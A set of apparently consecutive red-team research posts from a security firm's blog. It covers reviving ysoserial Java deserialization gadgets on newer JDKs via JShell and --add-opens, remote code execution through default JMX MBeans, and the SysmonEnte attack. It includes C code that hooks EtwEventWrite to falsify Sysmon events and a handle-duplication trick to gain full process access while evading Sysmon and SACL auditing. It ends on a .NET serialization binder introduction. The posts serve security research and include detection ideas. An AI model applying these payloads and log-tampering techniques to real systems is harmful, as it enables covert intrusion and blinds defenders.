We've moved our tech blog to our own homepage at https://code-white.com/blog. From now on, all fresh posts will go up there. We've also copied over all the old articles, so you won't miss anything. And don't worry, the existing Blogspot posts will remain intact to keep existing links working. But from now on, make sure to check out https://code-white.com/blog and, if you're interested, our all-new public vulnerabilities list.
Java deserialization gadgets have a long history in the context of vulnerability research, going back to at least 2015. One of the most popular tools providing a large set of different gadgets is ysoserial by Chris Frohoff. Recently, we observed increasing concerns from the community that several gadgets no longer seem to work with more recent JDK versions. In this blog post we try to summarize certain facts to re-enable some capabilities which seemed to be broken. Our journey did not begin with deserialization, though, but with looking for alternative ways of executing Java code in recent JDK versions. In this blog post, we'll focus on the OpenJDK and Oracle implementations. Defenders should adjust their search patterns to these alternative code execution patterns accordingly.
ScriptEngineManager - It's Gone
Initially, our problems began on another exploitation track not related to deserialization. Code execution payloads in Java often end with a final call to java.lang.Runtime.getRuntime().exec(args), at least in a proof-of-concept exploitation phase. But as a Red Team, we always try to maintain a low profile and avoid actions that may raise suspicion, like spawning new (child) processes. This is a well-known and still hot topic discussed in the context of C2 frameworks today, especially when it comes to AV/EDR evasion techniques. But this can also be applied to Java exploitation. It is a well-known fact that an attacker has the choice between different approaches to stay within the JVM to execute arbitrary Java code, with new javax.script.ScriptEngineManager().getEngineByName(engineName).eval(scriptCode) probably being the most popular one in recent years. The input code is usually JavaScript, executed by whatever ScriptEngine is available, e.g. Nashorn (or Rhino).
But since Nashorn was marked as deprecated in Java 11 (JEP 335) and removed entirely in Java 15 (JEP 372), a target using a JDK version >= 15 won't process JavaScript payloads by default anymore. Instead of hoping that developers manually added another JavaScript engine to a specific target, we could make use of a "new" Java code evaluation API: JShell, a read-eval-print loop (REPL) tool introduced with Java 9 (JEP 222). Mainly used via a command line interface (CLI) for testing Java code snippets, it allows programmatic access as well (see the JShell API). This new evaluation call reads like jdk.jshell.JShell.create().eval(javaCode), executing Java code snippets (not JavaScript!). Further call variants exist, too. We found this mentioned already in 2019 in the context of a SpEL injection payload. This all sounded too good to be true, but some restrictions seemed to apply nevertheless.
"The input should be exactly one complete snippet of source code, that is, one expression, statement, variable declaration, method declaration, class declaration, or import."
So, we started to play with some Java code snippets using the JShell API. First, we realized that it is indeed possible to use import statements within such snippets, but interestingly the subsequent statements were not executed anymore. This is expected given the quote above: one is actually restricted to a single statement per snippet.
We also learned that there is a huge difference between using the CLI and using the API programmatically. The jshell CLI tool supports the listing of pre-imported packages:
I.e. a code snippet in the CLI executing Files.createFile(java.nio.file.Paths.get("/tmp/RCE")); works just fine. Calling the eval method programmatically on a JShell instance instead gives a different result, namely that Files is not known in this context. As a side note, eval calls do not print any exception messages to stdout/stderr. For "debugging" purposes, the diagnostics method helps a lot: jshell.diagnostics(events.get(0).snippet()).forEach(x -> System.out.println(x.getMessage(Locale.ENGLISH)));.
Thus, it seems that we don't have access to a lot of "useful" classes with the programmatic approach. But as you might have guessed, fully qualified class names work as well. We don't have to "fix" the import issue mentioned above: all built-in JDK classes remain usable by referencing them with their full names: java.nio.file.Files.createFile(java.nio.file.Paths.get("/tmp/RCE"));. This again gives us all the power needed to build (almost) arbitrary Java code payloads for exfiltrating data, putting it into a server response, etc.
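To illustrate, the programmatic evaluation described above can be condensed into a small self-contained sketch (the class name and snippet strings are ours):

```java
import jdk.jshell.JShell;
import jdk.jshell.SnippetEvent;
import java.util.List;
import java.util.Locale;

public class JShellDemo {
    // Evaluate a single Java snippet programmatically and return its value.
    static String evalSnippet(String code) {
        try (JShell jshell = JShell.create()) {
            List<SnippetEvent> events = jshell.eval(code);
            // Print diagnostics manually: eval itself stays silent on errors
            events.forEach(e -> jshell.diagnostics(e.snippet()).forEach(
                    d -> System.out.println(d.getMessage(Locale.ENGLISH))));
            return events.get(0).value();
        }
    }

    public static void main(String[] args) {
        // Fully qualified names work; the jshell CLI's pre-imports do not apply here
        System.out.println(evalSnippet(
                "java.nio.file.Paths.get(\"/tmp/RCE\").toString()"));
    }
}
```

Note that by default the snippets run in a separate execution process spawned by JShell, so file system side effects are shared with the host while in-memory state is not.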
Ysoserial - The Possible
Besides the fact that we can now inject these kinds of payloads in various attack scenarios, this blog post is also about exploiting insecure deserialization. Starting with the well-known gadget CommonsCollections6, the original Runtime.getRuntime().exec(args) call will be replaced with a JShell variant. Using the handy TransformerChain pattern, one simply has to adjust the chain accordingly.
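A JShell-based transformer chain might then look like the following fragment (our sketch, not ysoserial's actual code; it assumes commons-collections 3.x on the classpath and a javaCode variable holding the snippet to execute):

```
// Hypothetical replacement for the Runtime.exec() transformer chain:
// JShell.class -> getMethod("create") -> invoke(null) -> eval(javaCode)
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(jdk.jshell.JShell.class),
        new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "create", new Class[0] }),
        new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),
        new InvokerTransformer("eval",
                new Class[] { String.class },
                new Object[] { javaCode })
};
Transformer chain = new ChainedTransformer(transformers);
```

The reflective steps mirror the classic Runtime chain: obtain the class object, fetch the static factory method, invoke it, then call eval on the resulting JShell instance.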
After a small adjustment to the pom.xml
we're ready to rebuild the ysoserial package with maven. But creating a payload with a recent version of JDK (version 17 in our case) revealed the following error.
In JDK 9, the Java Platform Module System (JPMS) was introduced, based on the "historical" Project Jigsaw. We highly recommend looking through the historical timeline with the corresponding JEPs in this IBM Java tutorial. For example, JEP 260 describes that most internal JDK APIs should be encapsulated properly, such that getters and setters have to be used to access or change otherwise privately declared internal member variables. The new Java module structure also explicitly restricts access between different modules, i.e. declaring lists of exported packages becomes a "must" to allow inter-module access via the new module descriptor module-info.java. Additionally, since JDK 16 the default strategy with respect to the Java Reflection API is "deny by default" (JEP 396).
The CommonsCollections library is not implemented as a Java module, so by definition it falls into the unnamed category (compare with the exception message above).
Browsing through the ysoserial GitHub issue tracker, people seem to have run into similar problems recently. One of the best articles explaining this kind of issue comes from Oracle itself. The chapter "Illegal Reflective Access" nicely summarizes the adjustments across JDK versions with respect to accessing otherwise inaccessible members between packages via the Java Reflection API.
"Some tools and libraries use reflection to access parts of the JDK that are meant for internal use only. This is called illegal reflective access and by default is not permitted in JDK 16 and later.
...
Code that uses reflection to access private fields of exported java.* APIs will no longer work by default.
The code will throw an InaccessibleObjectException."
Furthermore, Oracle states that
"If you need to use an internal API that has been made inaccessible, then use the --add-exports runtime option. You can also use --add-exports at compile time to access internal APIs.
If you have to allow code on the class path to do deep reflection to access nonpublic members, then use the --add-opens option."
Since CommonsCollections6 (and most other gadgets) makes heavy use of the Java Reflection API via java.lang.reflect.Field.setAccessible(boolean flag), this restriction has to be taken into account. Oracle already gave the solution above. Note that the --add-exports parameter does not allow "deep reflection", i.e. access to otherwise private members. So, creating the payload using java --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));" works just fine and gives code execution in insecure deserialization sinks again.
Ysoserial - The Impossible
Another popular gadget is CommonsBeanutils1, still frequently used these days to gain code execution through insecure deserialization. A short side note: this gadget chain uses Gadgets.createTemplatesImpl(cmd) to put your command into a Java statement, which is compiled into bytecode and executed later. Chris Frohoff already gave a nice hint in his code that instead of the java.lang.Runtime.getRuntime().exec(cmd) call, one "[...] could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections". That's already a powerful primitive which might not have been used by many people over the last years (at least it has not been made public as a popular choice).
But let's get back to trying to create a payload with JDK 17, which unfortunately results in a different exception than the one for CommonsCollections6.
This kind of error is expected, cross-checking with the Oracle article mentioned above, and can therefore be solved with the same approach: java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "[JAVA_CODE]" (see also Chris Frohoff's comment on an issue).
You might be aware of the deserializer test class in ysoserial. This can be called by piping the payload creation result directly into java -cp ./target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer. You should first test this with our CommonsCollections6 case above.
But what if we do this with our successfully created CommonsBeanutils1 gadget?
Sounds familiar? Unfortunately, this scenario is equivalent to server-side deserialization processing, i.e. no code execution! If you add the --add-opens parameters to the ysoserial.Deserializer call as well, deserialization works as expected, of course, but in a remote attack scenario we obviously don't have control over the target's JVM options!
Since org.apache.commons.beanutils.PropertyUtilsBean tries to access com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, traditional paths in gadget chains like TemplatesImpl turn out to be useless in most cases. This, again, is because third-party libraries known from ysoserial are not Java modules and the module system strongly protects internal JDK classes. If we check the module-info.java in the JDK's java.xml/share/classes/ directory, no exports can be found matching the needed package names. Game over.
Conclusions
Use JShell instead of ScriptEngineManager for JDK versions >= 15 (side note: JShell is not available in JREs!). This is also relevant for defenders searching for code execution patterns based only on Runtime.getRuntime().exec or ScriptEngineManager().getEngineByName(engineName).eval calls. Keep in mind that JShell is already available since JDK 9.
For JDK versions < 16, use the --add-opens options during payload creation.
For JDK versions >= 16, rely on known (or find new) Java deserialization gadgets which do not depend on access to internal JDK class members. However, check for the exported namespaces before giving up on a certain gadget chain.
The Java Management Extensions (JMX) are used by many, if not all, enterprise-level Java applications for managing and monitoring application settings and metrics. While exploiting an accessible JMX endpoint is well known and several free tools are available, this blog post will present new insights and a novel exploitation technique that allows for instant Remote Code Execution with no further requirements, such as outgoing connections or the existence of application-specific MBeans.
Introduction
How to exploit remote JMX services is well known. For instance, Attacking RMI based JMX services by Hans-Martin Münch gives a pretty good introduction to JMX as well as a historical overview of attacks against exposed JMX services. You may want to read it before proceeding so that we're on the same page.
And then there are also JMX exploitation tools such as mjet (formerly also known as sjet, also by Hans-Martin Münch) and beanshooter by my colleague Tobias Neitzel, both of which can be used to exploit known vulnerabilities in JMX services and MBeans.
However, some aspects are either no longer possible in current Java versions (e.g., pre-authenticated arbitrary Java deserialization via RMIServer.newClient(Object)) or they require certain MBeans to be present or conditions such as the server being able to connect back to the attacker (e.g., MLet with an HTTP URL).
In this blog post we will look into two other default MBean classes that can be leveraged for pretty unexpected behavior:
remote invocation of arbitrary instance methods on arbitrary serializable objects
remote invocation of arbitrary static methods on arbitrary classes
Tobias has implemented some of the gained insights into his tool beanshooter. Thanks!
Read The Fine Manual
By default, MBean classes are required to fulfill one of the following:
follow certain design patterns
implement certain interfaces
For example, the javax.management.loading.MLet class implements the javax.management.loading.MLetMBean interface, which fulfills the first requirement, the standard MBean design pattern: the class implements an interface of the same name ending with MBean.
The two specific MBean classes we will be looking at fulfill the second requirement:
Both classes provide features that don't seem to have gotten much attention yet, but are pretty powerful and allow interaction with the MBean server and MBeans that may even violate the JMX specification.
The Standard MBean Class StandardMBean
The StandardMBean was added to JMX 1.2 with the following description:
[…] the javax.management.StandardMBean class can be used to define standard MBeans with an interface whose name is not necessarily related to the class name of the MBean.
Here reflection is used to determine the attributes and operations based on the given interface class and the JavaBeans™ conventions.
That basically means that we can create MBeans of arbitrary classes and call methods on them that are defined by the interfaces they implement. The only restriction is that the class needs to be Serializable, as do any arguments we want to use in the method call.
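To see the StandardMBean mechanism in action locally, consider this sketch (the interface and class here are made up for demonstration; in the attack scenario the interesting targets are serializable JDK classes like TemplatesImpl):

```java
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.StandardMBean;
import java.io.Serializable;
import java.lang.management.ManagementFactory;

public class StandardMBeanDemo {
    // Any interface works; its methods become MBean operations
    public interface Greeter { String greet(String name); }

    // The wrapped class only needs to be Serializable for the remote scenario
    public static class GreeterImpl implements Greeter, Serializable {
        public String greet(String name) { return "Hello, " + name; }
    }

    public static String run() throws Exception {
        // Wrap an arbitrary object; the interface defines the management interface
        StandardMBean mbean = new StandardMBean(new GreeterImpl(), Greeter.class);
        MBeanServer server = ManagementFactory.getPlatformMBeanServer();
        ObjectName name = new ObjectName("demo:type=Greeter");
        server.registerMBean(mbean, name);
        // Invoke the interface method through the MBean server
        Object result = server.invoke(name, "greet",
                new Object[] { "JMX" }, new String[] { String.class.getName() });
        server.unregisterMBean(name);
        return (String) result;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(run());
    }
}
```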
public final class TemplatesImpl implements Templates, Serializable
Meet the infamous TemplatesImpl! It is an old acquaintance from Java deserialization gadgets, as it is serializable and calling any of the following public methods results in the loading of a class from the byte code embedded in the private field _bytecodes:
TemplatesImpl.getOutputProperties()
TemplatesImpl.getTransletIndex()
TemplatesImpl.newTransformer()
The first and last methods are actually defined in the javax.xml.transform.Templates interface that TemplatesImpl implements. The getOutputProperties() method also fulfills the requirements for a MBean attribute getter method, which makes it a perfect trigger for serializers calling getter methods during the process of deserialization.
In this case it means that we can call these Templates interface methods remotely and thereby achieve arbitrary Remote Code Execution in the JMX service process:
Here we even have the choice to either read the attribute OutputProperties (resulting in an invocation of getOutputProperties()) or to invoke getOutputProperties() or newTransformer() directly.
The Model MBean Class RequiredModelMBean
The javax.management.modelmbean.RequiredModelMBean has been part of JMX since version 1.0 and is even more versatile than the StandardMBean:
This model MBean implementation is intended to provide ease of use and extensive default management behavior for the instrumentation.
– Java™ Management Extensions Instrumentation and Agent Specification, v1.0
Also:
Java resources wishing to be manageable instantiate the RequiredModelMBean using the MBeanServer's createMBean method. The resource then sets the MBeanInfo and Descriptors for the RequiredModelMBean instance. The attributes and operations exposed via the ModelMBeanInfo for the ModelMBean are accessible from MBeans, connectors/adaptors like other MBeans. […]
So instead of having the wrapping MBean class use reflection to retrieve the MBean information from the interface class, a RequiredModelMBean allows specifying the set of attributes, operations, etc. by providing a ModelMBeanInfo with corresponding ModelMBeanAttributeInfo, ModelMBeanOperationInfo, etc.
That means we can define which public instance attribute getters, setters, and regular methods we want to be invokable remotely.
Invoking Arbitrary Instance Methods
We can even define methods that do not fulfill the JavaBeans™ convention or MBeans design patterns like this example with java.io.File demonstrates:
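A minimal local sketch of this technique with java.io.File (object name and path are our choices):

```java
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.modelmbean.ModelMBeanInfo;
import javax.management.modelmbean.ModelMBeanInfoSupport;
import javax.management.modelmbean.ModelMBeanOperationInfo;
import javax.management.modelmbean.RequiredModelMBean;
import java.io.File;
import java.lang.management.ManagementFactory;

public class ModelMBeanFileDemo {
    public static Object run(String path) throws Exception {
        // Expose java.io.File.exists() as a ModelMBean operation
        ModelMBeanOperationInfo op = new ModelMBeanOperationInfo(
                "exists", File.class.getMethod("exists"));
        ModelMBeanInfo info = new ModelMBeanInfoSupport(
                File.class.getName(), "File resource", null, null,
                new ModelMBeanOperationInfo[] { op }, null);
        RequiredModelMBean mbean = new RequiredModelMBean(info);
        // The managed resource: any serializable object instance
        mbean.setManagedResource(new File(path), "ObjectReference");
        MBeanServer server = ManagementFactory.getPlatformMBeanServer();
        ObjectName name = new ObjectName("demo:type=File");
        server.registerMBean(mbean, name);
        // Invoke the instance method through the MBean server
        Object result = server.invoke(name, "exists",
                new Object[0], new String[0]);
        server.unregisterMBean(name);
        return result;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(run("/tmp"));
    }
}
```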
This works with every serializable object and public instance method. Arguments also need to be serializable. Return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.
Invoking Arbitrary Static Methods
While working on the implementation of some of the insights described here into beanshooter, Tobias pointed out that it is also possible to invoke static methods on arbitrary classes.
At first I was baffled, because when reading the implementation of RequiredModelMBean.invoke(String, Object[], String[]), there is no way for targetObject to be null. And my assumption was that for calling static methods, the object instance provided as first argument to Method.invoke(Object, Object...) must be null. However, I figured that my assumption was entirely wrong after reading the manual:
If the underlying method is static, then the specified obj argument is ignored. It may be null.
Furthermore, the method is not even required to be declared in a serializable class; any static method of any class can be specified! Awesome finding, Tobias!
So, for calling static methods, an additional Descriptor instance needs to be provided to the ModelMBeanOperationInfo constructor which holds a class field with the targeted class name.
The provided class field is read in RequiredModelMBean.invoke(String, Object[], String[]) and overrides the target class variable, which otherwise would be obtained by calling getClass() on the resource object.
For instance, to create a ModelMBeanOperationInfo for System.setProperty(String, String), the following can be used:
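A runnable sketch of this, wrapped into a local demo (object name and property key are ours; the descriptor fields follow the behavior described above):

```java
import javax.management.Descriptor;
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.modelmbean.DescriptorSupport;
import javax.management.modelmbean.ModelMBeanInfo;
import javax.management.modelmbean.ModelMBeanInfoSupport;
import javax.management.modelmbean.ModelMBeanOperationInfo;
import javax.management.modelmbean.RequiredModelMBean;
import java.lang.management.ManagementFactory;
import java.lang.reflect.Method;

public class StaticInvokeDemo {
    public static String run() throws Exception {
        Method m = System.class.getMethod("setProperty",
                String.class, String.class);
        // The "class" field overrides the target class in invoke(),
        // enabling static methods of arbitrary classes
        Descriptor desc = new DescriptorSupport();
        desc.setField("name", "setProperty");
        desc.setField("descriptorType", "operation");
        desc.setField("role", "operation");
        desc.setField("class", "java.lang.System");
        ModelMBeanOperationInfo op = new ModelMBeanOperationInfo(
                "System.setProperty", m, desc);
        ModelMBeanInfo info = new ModelMBeanInfoSupport(
                "java.lang.String", "any serializable resource", null, null,
                new ModelMBeanOperationInfo[] { op }, null);
        RequiredModelMBean mbean = new RequiredModelMBean(info);
        mbean.setManagedResource("ignored", "ObjectReference"); // a String suffices
        MBeanServer server = ManagementFactory.getPlatformMBeanServer();
        ObjectName name = new ObjectName("demo:type=Static");
        server.registerMBean(mbean, name);
        server.invoke(name, "setProperty",
                new Object[] { "demo.test", "quack" },
                new String[] { String.class.getName(), String.class.getName() });
        server.unregisterMBean(name);
        return System.getProperty("demo.test");
    }

    public static void main(String[] args) throws Exception {
        System.out.println(run());
    }
}
```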
As already said, for calling the static method, the resource managed by RequiredModelMBean can be any arbitrary serializable instance. So even a String suffices.
This works with any public static method regardless of the class it is declared in. But again, provided argument values still need to be serializable. And return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.
Conclusion
Even though exploitation of JMX is generally well understood and comprehensively researched, apparently no one had looked into the aspects described here.
So check your assumptions! Don't take things for granted, even when it seems everyone has already looked into it. Dive deep to understand it fully. You might be surprised.
In this blog post we demonstrate an attack on the integrity of Sysmon that generates a minimal number of observable events, making it difficult to detect in environments where no additional security products are installed.
tl;dr:
Suspend all threads of Sysmon.
Create a limited handle to Sysmon and elevate it by duplication.
Clone the pseudo handle of Sysmon to itself in order to bypass SACL as proposed by James Forshaw.
Inject a hook manipulating all events (in particular ProcessAccess events on Sysmon).
At Code White we are used to performing complex attacks against hardened and strictly monitored environments. A reasonable approach to stay under the radar of the blue team is to blend in with false positives by adapting normal process- and user behavior, carefully choosing host processes for injected tools and targeting specific user accounts.
However, clients with whom we have been working for a while have reached a high level of maturity. Their security teams strictly follow all the hardening advice we give them and invest a lot of time in collecting and base-lining security related logs while constantly developing and adapting detection rules.
We often see clients making heavy use of Sysmon, along with the Windows Event Logs and a traditional AV solution. For them, Sysmon is the root of trust for their security monitoring and its integrity must be ensured. However, an attacker who covertly compromises the integrity of Sysmon effectively breaks the security model of these clients.
In order to undermine the aforementioned security-setup, we aimed at attacking Sysmon to tamper with events in a manner which is difficult to detect using Sysmon itself or the Windows Event Logs.
Attacks on Sysmon and Detection
Having done some Googling on how to blind Sysmon, we realized that all publicly documented ways (at least those we found) are detectable via Sysmon itself or the Windows Event Logs:
Unloading Sysmon Driver - Detectable via Sysmon event id 255, Windows Security Event ID 4672.
While we were confident that we could kill Sysmon before it throws Event ID 5 (Process terminated), we thought that a host not sending any events would be suspicious and could be noticed in a client's SIEM. Also, loading a signed, whitelisted and exploitable driver to attack from kernel land was out of scope, to maintain stability.
Since all of these documented attack vectors are somehow detectable via Sysmon itself or the Windows Event Logs, or can cause stability issues, we needed a new attack vector with the following capabilities:
Not detectable via Sysmon itself
Not detectable via Windows Event Log
Sysmon must stay alive
Attack from usermode
Injecting into Sysmon and manipulating its control flow seemed the most promising approach.
Attack Description
Similarly to SysmonQuiet or EvtMute, the idea is to inject code into Sysmon which redirects the execution flow in such a way that events can be manipulated before being forwarded to the SIEM.
However, the attack must work in such a way that corresponding ProcessAccess events on Sysmon are not observable via Sysmon or the Event Log.
This presents various problems, but let us first see where such a hook would be applicable.
Manipulating the Execution Flow
Sysmon forwards events to ETW subscribers via the documented function ntdll!EtwEventWrite. This is easily observable by setting an appropriate breakpoint.
The Id field of the EVENT_DESCRIPTOR determines the type of event and is important to apply the correct struct definition for the event data pointed to by PEVENT_DATA_DESCRIPTOR.
The structs for the different events are obviously different for each Sysmon Event Id, as different fields and information are included.
Our injected code must thus be able to apply the correct struct depending on which event is being emitted by Sysmon.
But how do we know the definition of the event structs? Luckily, ETW Explorer has already documented the event definitions:
A definition for the userdata struct describing a ProcessAccess event might therefore look as follows:
We can validate this in x64dbg by setting a breakpoint at ntdll!EtwEventWrite and applying the said struct definition for a ProcessAccess event.
Faking events
Being responsible for forwarding events, ntdll!EtwEventWrite is a good place to install a hook that redirects the control flow to injected code, which first manipulates the event and then forwards it:
The injected code manipulating the events might look like this:
//Hooked EtwEventWrite function
ULONG Hook_EtwEventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData)
{
    //Get the address of the EtwEventWriteFull function
    _EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)getFunctionPtr(CRYPTED_HASH_NTDLL, CRYPTED_HASH_ETWEVENTWRITEFULL);
    if (EtwEventWriteFull == NULL) {
        goto exit;
    }

    //Check if it is a process access event and needs to be tampered with
    switch (EventDescriptor->Id) {
    case EVENT_PROCESSACCESS:
        HandleProcessAccess((PProcessAccess)UserData);
        break;
    default:
        break;
    }

    //Forward the event with the EtwEventWriteFull function
    EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);

exit:
    return 0;
}
//Make ProcessAccess events targeting Sysmon itself look benign
VOID HandleProcessAccess(PProcessAccess pProcessAccess)
{
    ACCESS_MASK access_mask_benign = 0x1400;
    PCWSTR wstr_sysmon = L"Sysmon";
    PCWSTR wstr_ente = L"Ente";
    PWSTR psysmon = NULL;

    //Sysmon check
    psysmon = StrStrIW(pProcessAccess->ptargetimage, wstr_sysmon);
    if (psysmon != NULL) {
        //Replace the access mask with the benign 0x1400
        *pProcessAccess->pGrantedAccess = access_mask_benign;
        pProcessAccess->sizeGrantedAccess = sizeof(access_mask_benign);

        //Replace the source user with "Ente"
        lstrcpyW(pProcessAccess->pSourceUser, wstr_ente);
        pProcessAccess->sizeSourceUser = sizeof(wstr_ente);
    }
}
Note, how ntdll!EtwEventWriteFull is used to forward every event.
Since we know where to inject the hook and what the UserData structs look like, we are now able to tamper with every Sysmon event before it is forwarded.
However, the injection into Sysmon remains observable and the corresponding ProcessAccess event is the last event we do not control.
Detection of Process Manipulation
OpenProcess Access event
In order to create a handle to Sysmon which allows us to conduct process injection of any kind, we need to open Sysmon with at least the following access mask: PROCESS_VM_OPERATION | PROCESS_VM_WRITE. As Sysmon has not yet been modified while we open this handle, a suspicious ProcessAccess Event is generated which is an IOC defenders could hunt for:
Handle Elevation
Playing with kernel32!DuplicateHandle for another project, we noticed that MSDN states something very interesting:
In some cases, the new handle can have more access rights than the original handle.
Thus, by first creating a handle with a very limited access mask and then duplicating this handle with a new access mask, we technically do not create a new handle with a high access mask.
Sysmon, which (to the best of our knowledge) only uses OB_OPERATION_HANDLE_CREATE, sees the benign access mask, but not the duplication of the handle with a higher access mask:
Using handle elevation we can gain handles with arbitrary process access masks to arbitrary (non-ppl) processes while Sysmon only logs the instantiation of the original handle. Great Success!
Unfortunately, there are some problems:
This only works if the targeted process runs as the same user as the duplicating process.
This can be easily circumvented by stealing a token from a System process.
We steal the token from an elevated svchost process running as System by only using a PROCESS_QUERY_LIMITED_INFORMATION mask, where we do not need the SE_DEBUG privilege which is often used in detection rules.
System Access Control Lists (SACL).
This is a bigger problem
Detection via System Access Control Lists (SACL)
Unfortunately, it is still possible to observe the duplication of the handle by configuring Object Access Auditing using a SACL on Sysmon. The following screenshot shows how ProcessHacker is leveraged to configure the SACL:
With this SACL, event 4656 is generated by the Windows Event Log service upon creation of a handle to Sysmon that allows writing to its memory. This event is also emitted if handle elevation is used.
Note: In the default config, Object Access Auditing is not enabled.
According to James Forshaw's post, we can duplicate the pseudo handle of a different process to itself to get full access to the process without triggering Object Access Auditing.
A stealthy way to gain a handle suitable for process injection would be the following:
Open a process handle to Sysmon with a very limited access mask (A detection rule based on this would generate too many false positives)
Elevate this handle using ntdll!NtDuplicateObject to hold the PROCESS_DUP_HANDLE right (bypasses Sysmon's telemetry)
Use the elevated handle to duplicate the pseudo Handle of Sysmon (Bypasses SACL).
uPid.UniqueProcess = dwPid;
uPid.UniqueThread = 0;
ntStatus = NtOpenProcess(&hlowpriv, PROCESS_QUERY_LIMITED_INFORMATION, &ObjectAttributes, &uPid);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to open low priv handle to sysmon\n");
ntStatus = NtDuplicateObject(NtCurrentProcess(), hlowpriv, NtCurrentProcess(), &hduppriv, PROCESS_DUP_HANDLE, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to elevate to handle with PROCESS_DUP_HANDLE rights\n");
ntStatus = NtDuplicateObject(hduppriv, NtCurrentProcess(), NtCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
FATAL("[-] Failed to elevate to handle with PROCESS_ALL_ACCESS rights\n");
Doing so we gain a full access handle to Sysmon while bypassing Sysmon's telemetry and SACL.
Fine Tuning
There was one last IOC we could come up with. Sysmon can only observe the creation of a limited handle to itself, however, following the golden rule of never touching disk, our tool being unpacked or injected into another process will have a broken calltrace containing unknown sections. Since Sysmon has not been tampered with at this point, this would be the last event which we do not have under control and might be sufficient to create a detection rule upon!
We can delay the forwarding of this event by suspending all threads of Sysmon. The events are then queued and dispatched only after we resume the threads, giving us enough time to install a hook manipulating all ProcessAccess events on Sysmon itself. This is possible, because no events for accessing, suspending or resuming a thread exist in Sysmon.
The hook then necessarily spoofs the callstack included in the ProcessAccess event.
Putting It All Together
We combined all of these steps into a tool we call SysmonEnte, which you can find on our GitHub.
SysmonEnte is implemented as fully position independent code (PIC) which can be called using the following prototype:
DWORD go(DWORD dwPidSysmon);
A sample loader is included and built during compilation when typing make.
Additionally, SysmonEnte uses indirect syscalls to bypass userland hooks while injecting into Sysmon.
The open source variant tampers with process access events on Lsass and Sysmon and sets the access mask to a benign one. Additionally, the source user and the callstack are set to Ente. You can change these to your needs.
Possible Detection Methods
From our point of view, several detection ideas exist:
ETW TI
The easiest solution would be to subscribe to the Threat Intelligence ETW provider to observe injections or suspicious code manipulations. This however requires a signed ELAM driver.
If you have the possibility to enable Object Access Auditing, you can configure a SACL for Sysmon to monitor the duplication of handles to catch the SACL bypass used to gain a handle to Sysmon. We are not sure about false positives in large environments though.
To the best of our knowledge, and in contrast to SACLs for filesystem or registry operations, configuring Object Access Auditing on processes is only achievable by writing a custom program. This circumstance makes the detection of handle duplication via SACL non-trivial.
A sample program is included on our GitHub; it configures a SACL with ACCESS_SYSTEM_SECURITY + PROCESS_DUP_HANDLE + PROCESS_VM_OPERATION, applied to the group Everyone. ACCESS_SYSTEM_SECURITY is included because otherwise attackers could covertly change the SACL.
With this configuration, attempts to duplicate a handle to Sysmon should become visible.
Note: Object Access Auditing is not enabled by default and must be enabled via Group Policy prior the use of the tool.
Final Words
Sysmon on it's own is not able to protect itself sufficiently, and it is difficult to observe the described attack with the event log.
We believe that running Sysmon alone, without any protection from a trusted third party tool sitting in kernel land or running as a PPL, is not guaranteed to produce reliable logs with ensured integrity. A possible fix by Microsoft would be to allow running Sysmon as a PPL.
It is noteworthy that the described technique of handle elevation + SACL bypass can also be used to stealthily dump Lsass.
After our talk at X33fcon, nanodump supports handle elevation as well.
However, a SACL with PROCESS_VM_READ is configured for Lsass by default. ;-)
Serialization binders are often used to validate types specified in the serialized data to prevent the deserialization of dangerous types that can have malicious side effects with the runtime serializers such as the BinaryFormatter.
In this blog post we'll have a look into cases where this can fail and consequently may allow to bypass validation. We'll also walk though two real-world examples of insecure serialization binders in the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277), that both allow remote code execution.
Introduction
Type Names
Type names are used to identify .NET types. In the fully qualified form (also known as assembly qualified name, AQN), it also contains the information on the assembly the type should be loaded from. This information comprises of the assembly's name as well as attributes specifying its version, culture, and a token of the public key it was signed with. Here is an (extensive) example of such an assembly qualified name:
This assembly qualified name comprises of two parts with several components:
Assembly Qualified Name (AQN)
Type Full Name
Namespace
Type Name
Generic Type Parameters Indicator
Nested Type Name
Generic Type Parameters
Embedded Type AQN (EAQN)
Assembly Full Name
Assembly Name
Assembly Attributes
You can see that the same breakdown can also be applied to the embedded type's AQN. For simplicity, the type info will be referred to as type name and the assembly info will be referred to as assembly name as these are the general terms used by .NET and thus also within this post.
The assembly and type information are used by the runtime to locate and bind the assembly. That software component is also sometimes referred to as the CLR Binder.
Serialization Binders
In its original intent, a SerializationBinder was supposed to work just like the runtime binder but only in the context of serialization/deserialization with the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:
Some users need to control which class to load, either because the class has moved between assemblies or a different version of the class is required on the server and client. — SerializationBinder Class
For that, a SerializationBinder provides two methods:
public virtual void BindToName(Type serializedType, out string assemblyName, out string typeName);
public abstract Type BindToType(string assemblyName, string typeName);
